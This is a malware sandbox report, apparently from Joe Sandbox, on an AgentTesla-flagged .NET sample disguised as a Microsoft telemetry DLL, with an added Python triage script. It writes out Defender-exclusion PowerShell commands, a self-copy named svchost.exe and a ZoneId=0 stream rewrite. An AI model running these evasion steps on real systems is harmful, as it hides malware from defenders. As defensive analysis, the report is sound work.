                                                                                                                  PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152428
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.zLIiz7Tp.20210915152056.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.400612170734219
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZx/GN0NqDo1Z2eZB/GN0NqDo1Zs4z+zQzjZT/GN0NqDo1Zw5zAzAz4Zn:B
                                                                                                                  MD5:FF457E1B47D5AFE9390B49F3317BAA79
                                                                                                                  SHA1:FEDC428467F1FB3D35B3F839596F8B54B5A8EEEA
                                                                                                                  SHA-256:B6BC45334C5760A4A6F68CC2E0CE1C44B85170FB6443712F96B16858908CFD76
                                                                                                                  SHA-512:E9CF0C7EE0AAD3AFEF07A6356085F74361B93E21BE4F4ADE5A9801F6C3084D19B8BD4BB994CCD2C560C1C76F0645AD82DB086F2445172160A2A9D459C22EF983
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152058
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\user
                                                                                                                  Configuration Name:
                                                                                                                  Machine: 928100 (Microsoft Windows NT 10.0.17134.0)
                                                                                                                  Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force
                                                                                                                  Process ID: 6288
                                                                                                                  PSVersion: 5.1.17134.1
                                                                                                                  PSEdition: Desktop
                                                                                                                  PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                                                                                                  BuildVersion: 10.0.17134.1
                                                                                                                  CLRVersion: 4.0.30319.42000
                                                                                                                  WSManStackVersion: 3.0
                                                                                                                  PSRemotingProtocolVersion: 2.3
                                                                                                                  SerializationVersion: 1.1.0.1
                                                                                                                  **********************
                                                                                                                  **********************
                                                                                                                  Command start time: 20210915152058
                                                                                                                  **********************
                                                                                                                  PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152410
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\a
                                                                                                                  C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):780216
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  MD5:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  SHA1:DE4DDE34707658D98F50DE8CF2A182BF7DED2A45
                                                                                                                  SHA-256:A6BDCE859B5373990681D6ED6C6133A80330FA2744EA9C1E88018D03AB77FEB2
                                                                                                                  SHA-512:CEDFCB1FBBCFC9C0592D346295C1225B926D4C7246A81F98CB4E50007629C4F60DEB9C1F8A539C353835D1213F2C291D81996B6F327A27DAD38E4B1E4BCEDD86
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`.................................$...J.......H.................... ......n...8............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..@................T.......H.......................4...n............................................V..m3Q..L9.FM>....Fzq.Z..._...b...^....2..!.\..UQU...v...L..........T}3.3c...=(.p.X....-.U9.^.m..W..!...j.....qI...c'..!.5.5e(6&<..F*.8............a....U4..8k.i.....y..=.f..k..$...wT....bh./.Y"`@...W...l0?.....{...:}......O.Z#....!....y.A.6.zN.gD...y.j...[...*.@8.V.e.iz...!...7u...V.q..}P..L..)..... .8....^.i.Y-t....^....~`.eH;.E...T..Wq*._.."...ynN.@MH@...($...<..;{..g#Q...@.Ws...R..C
                                                                                                                  C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe:Zone.Identifier
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:modified
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
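Three things in the listing above belong together. The dropped file C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe has the submitted sample's MD5, SHA-1, SHA-256, SHA-512, SSDEEP and size (780216 bytes), so it is a byte-for-byte self-copy under a benign system name in a Windows subdirectory that Defender does not treat specially. The PowerShell transcripts record Add-MpPreference -ExclusionPath being run for the sample on the Desktop, for the Startup-folder copy 481F404B.exe and for that svchost.exe copy (the transcript writes the folder as aero\Shell, the listing as aero\shell; NTFS does not distinguish them). The Zone.Identifier stream written next to the copy contains ZoneId=0, which is URLZONE_LOCAL_MACHINE, so the copy carries no mark of the web. The Python below is an added example, not the sandbox vendor's or the report's code: it parses records in the Key:Value layout used on this page and runs those three checks over a constructed excerpt of the records above. Transcript file names in the excerpt are placeholders; the Preview text and hashes are copied from the listing.

```python
"""Triage checks over a sandbox dropped-files listing (added example, not part
of the original report). Records open with a bare Windows path, as on this page."""
import re

# SHA-256 of the submitted sample, from the report's General Information.
SAMPLE_SHA256 = "a6bdce859b5373990681d6ed6c6133a80330fa2744ea9c1e88018d03ab77feb2"

# Constructed excerpt of four records from the listing, trimmed to the fields
# used here; transcript file names are placeholders. The first Preview keeps the
# sandbox's one-line form ('..' is a CRLF), the second is split into lines.
REPORT_EXCERPT = r"""
C:\Users\user\Documents\20210915\PowerShell_transcript.example-1.txt
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Preview: .**********************..Windows PowerShell transcript start..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..Process ID: 6828..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..
C:\Users\user\Documents\20210915\PowerShell_transcript.example-2.txt
Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Preview:
**********************
Windows PowerShell transcript start
Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force
Process ID: 1036
PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force
C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe
Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
SHA-256:A6BDCE859B5373990681D6ED6C6133A80330FA2744EA9C1E88018D03AB77FEB2
C:\Windows\Resources\Themes\aero\shell\4B6A7152\svchost.exe:Zone.Identifier
Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
Preview: [ZoneTransfer]....ZoneId=0
"""

PATH_RE = re.compile(r"^[A-Za-z]:\\")
FIELD_RE = re.compile(r"^([A-Za-z0-9 ()\-]+?):(.*)$")
# The path argument runs until the next -Switch, the next '..' (CRLF) or line end.
EXCLUSION_RE = re.compile(
    r"Add-MpPreference\s+-ExclusionPath\s+(.+?)(?=\s+-[A-Za-z]|\.\.|$)", re.M)
ADS_SUFFIX = ":Zone.Identifier"


def parse_records(text):
    """One dict per dropped file; every line after 'Preview:' belongs to the preview."""
    records, current, in_preview = [], None, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if PATH_RE.match(line):                   # a bare path opens a new record
            current, in_preview = {"path": line}, False
            records.append(current)
        elif current is None:
            continue
        elif in_preview:                          # preview continued on a new line
            current["Preview"] = (current["Preview"] + "\n" + line).strip()
        elif (m := FIELD_RE.match(line)):
            key, value = m.group(1).strip(), m.group(2).strip()
            current[key] = value
            in_preview = key == "Preview"
    return records

def self_copies(records, sample_sha256):
    """Dropped files carrying the sample's own SHA-256: the malware copying itself."""
    want = sample_sha256.lower()
    return [r["path"] for r in records if r.get("SHA-256", "").lower() == want]

def defender_exclusions(records):
    """Paths given to Add-MpPreference -ExclusionPath in transcripts -> hit count."""
    hits = {}
    for r in records:
        if "powershell" not in r.get("Process", "").lower():
            continue
        for m in EXCLUSION_RE.finditer(r.get("Preview", "")):
            hits[m.group(1).strip()] = hits.get(m.group(1).strip(), 0) + 1
    return hits

def excluded_dropped_files(records):
    """Dropped files that an exclusion covers. NTFS paths are case-insensitive
    (the transcript spells the folder 'Shell', the listing 'shell'): compare folded."""
    excluded = {p.lower() for p in defender_exclusions(records)}
    return [r["path"] for r in records if r["path"].lower() in excluded]

def motw_local_zone(records):
    """Files whose Zone.Identifier stream was written with ZoneId=0
    (URLZONE_LOCAL_MACHINE), so SmartScreen and Defender see no mark of the web."""
    out = []
    for r in records:
        m = re.search(r"ZoneId=(\d+)", r.get("Preview", ""))
        if r["path"].endswith(ADS_SUFFIX) and m and int(m.group(1)) == 0:
            out.append(r["path"][:-len(ADS_SUFFIX)])
    return out

def triage(text, sample_sha256=SAMPLE_SHA256):
    records = parse_records(text)
    return {"self_copies": self_copies(records, sample_sha256),
            "exclusions": defender_exclusions(records),
            "excluded_drops": excluded_dropped_files(records),
            "motw_local_zone": motw_local_zone(records)}

if __name__ == "__main__":
    print(triage(REPORT_EXCERPT))
```

On a live host the same three questions are answered by Get-MpPreference (ExclusionPath), by hashing the file in the Themes directory against the sample, and by reading the Zone.Identifier stream with Get-Content -Stream; the parser here only reproduces that reasoning over the report text.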

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  TrID:
                                                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                                                                  • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                                                                  • Windows Screen Saver (13104/52) 0.07%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                                  • DOS Executable Generic (2002/1) 0.01%
                                                                                                                  File name:VknMvPoCXZ.exe
                                                                                                                  File size:780216
                                                                                                                  MD5:0cecfa83ee6ea6dd1de38462bbedf15c
                                                                                                                  SHA1:de4dde34707658d98f50de8cf2a182bf7ded2a45
                                                                                                                  SHA256:a6bdce859b5373990681d6ed6c6133a80330fa2744ea9c1e88018d03ab77feb2
                                                                                                                  SHA512:cedfcb1fbbcfc9c0592d346295c1225b926d4c7246a81f98cb4e50007629c4f60deb9c1f8a539c353835d1213f2c291d81996b6f327a27dad38e4b1e4bcedd86
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`................................

                                                                                                                  File Icon

                                                                                                                  Icon Hash:00828e8e8686b000

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x4be619
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x400000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT, HIGH_ENTROPY_VA
                                                                                                                  Time Stamp:0xDA8605A3 [Wed Mar 6 01:25:55 2086 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                                                  OS Version Major:4
                                                                                                                  OS Version Minor:0
                                                                                                                  File Version Major:4
                                                                                                                  File Version Minor:0
                                                                                                                  Subsystem Version Major:4
                                                                                                                  Subsystem Version Minor:0
                                                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=Sectigo Public Code Signing CA R36, O=Sectigo Limited, C=GB
Signature Validation Error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file
Error Number: -2146762495
Not Before, Not After
• 7/7/2021 5:00:00 PM 7/8/2022 4:59:59 PM
Subject Chain
• CN=Afia Wave Enterprises Oy, O=Afia Wave Enterprises Oy, L=Helsinki, S=Uusimaa, C=FI
Version: 3
Thumbprint MD5: 4D53204310277C51FA444D3365AA03EB
Thumbprint SHA-1: 9B6F3B3CD33AE938FBC5C95B8C9239BAC9F9F7BF
Thumbprint SHA-256: 999BBF99F3B3C1A894340918D8F2C6A358E7EC6299BAB5D8FD6B9E7570ABF929
Serial: 69AD1E8B5941C93D5017B7C3FDB8E7B6

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name                                   Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT           0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT           0xbe524          0x4a          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE         0xc0000          0x548         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION        0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY         0xbd200          0x15b8
IMAGE_DIRECTORY_ENTRY_BASERELOC        0xc2000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG            0xbe56e          0x38          .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT        0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR        0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS              0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG      0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT              0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT     0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR   0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED         0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0xbc61f       0xbc800   False     0.683798387765   data       6.54480652583   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0xc0000          0x548         0x600     False     0.333984375      data       3.74389579657   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0xc2000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name           RVA      Size   Type  Language  Country
RT_GROUP_ICON  0xc00a0  0x6    data
RT_VERSION     0xc00a8  0x49e  data

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Microsoft Corporation.All rights reserved.
Assembly Version  15.3.0.0
InternalName      Microsoft.VisualStudio.DevOps.Telemetry.dll
FileVersion       0.4.13.22810
CompanyName       Microsoft Corporation
Comments          Microsoft.VisualStudio.DevOps.Telemetry
ProductName       Microsoft Visual Studio
ProductVersion    0.4.13+g1a59147604.22810
FileDescription   Microsoft.VisualStudio.DevOps.Telemetry
OriginalFilename  Microsoft.VisualStudio.DevOps.Telemetry.dll

Network Behavior

Network Port Distribution

UDP Packets

Timestamp                             Source Port  Dest Port  Source IP    Dest IP
Sep 15, 2021 15:20:21.145026922 CEST  65447        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:20:21.173506975 CEST  53           65447      8.8.8.8      192.168.2.5
Sep 15, 2021 15:20:38.187390089 CEST  52441        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:20:38.242679119 CEST  53           52441      8.8.8.8      192.168.2.5
Sep 15, 2021 15:20:56.416903019 CEST  62176        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:20:56.443344116 CEST  53           62176      8.8.8.8      192.168.2.5
Sep 15, 2021 15:20:56.602914095 CEST  59596        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:20:56.630760908 CEST  53           59596      8.8.8.8      192.168.2.5
Sep 15, 2021 15:21:14.728933096 CEST  65296        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:21:14.756941080 CEST  53           65296      8.8.8.8      192.168.2.5
Sep 15, 2021 15:21:18.132777929 CEST  63183        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:21:18.163100004 CEST  53           63183      8.8.8.8      192.168.2.5
Sep 15, 2021 15:21:24.774127960 CEST  60151        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:21:24.800704956 CEST  53           60151      8.8.8.8      192.168.2.5
Sep 15, 2021 15:21:25.923398972 CEST  56969        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:21:25.970354080 CEST  53           56969      8.8.8.8      192.168.2.5
Sep 15, 2021 15:21:33.151094913 CEST  55161        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:21:33.177848101 CEST  53           55161      8.8.8.8      192.168.2.5
Sep 15, 2021 15:21:41.321341038 CEST  54757        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:21:41.357259035 CEST  53           54757      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:04.617964983 CEST  49992        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:04.654059887 CEST  53           49992      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:18.271564007 CEST  60075        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:18.317687988 CEST  53           60075      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:22.083347082 CEST  55016        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:22.119514942 CEST  53           55016      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:33.184061050 CEST  64346        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:33.213447094 CEST  53           64346      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:39.139003992 CEST  57128        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:39.166477919 CEST  53           57128      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:40.278376102 CEST  50463        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:40.278419018 CEST  54791        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:40.302717924 CEST  53           54791      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:40.303340912 CEST  53           50463      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:40.340203047 CEST  50394        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:40.367719889 CEST  53           50394      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:44.756346941 CEST  58530        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:44.787528038 CEST  53           58530      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:44.838032007 CEST  53813        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:44.864212036 CEST  53           53813      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:45.009485960 CEST  63732        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:45.036564112 CEST  53           63732      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:45.690366030 CEST  57344        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:45.719934940 CEST  53           57344      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:50.835201979 CEST  54450        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:50.862657070 CEST  53           54450      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:53.097054005 CEST  59261        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:53.130618095 CEST  53           59261      8.8.8.8      192.168.2.5
Sep 15, 2021 15:22:56.630136967 CEST  57151        53         192.168.2.5  8.8.8.8
Sep 15, 2021 15:22:56.660283089 CEST  53           57151      8.8.8.8      192.168.2.5

Code Manipulations

Statistics

Behavior

System Behavior

General

Start time: 15:20:26
Start date: 15/09/2021
Path: C:\Users\user\Desktop\VknMvPoCXZ.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\VknMvPoCXZ.exe'
Imagebase: 0x200000
File size: 780216 bytes
MD5 hash: 0CECFA83EE6EA6DD1DE38462BBEDF15C
Has elevated privileges: true
Has administrator privileges: true
Programmed in: .Net C# or VB.NET
Yara matches:
• Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.505833995.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.384861016.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.588060641.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.430706914.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.593102084.0000000006BD0000.00000004.00020000.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000003.263705038.0000000003B32000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.436158543.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000002.587807203.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000002.588256996.0000000003919000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000001.00000000.432260240.00000000037D1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000001.00000000.431825282.00000000038A1000.00000004.00000001.sdmp, Author: Joe Security
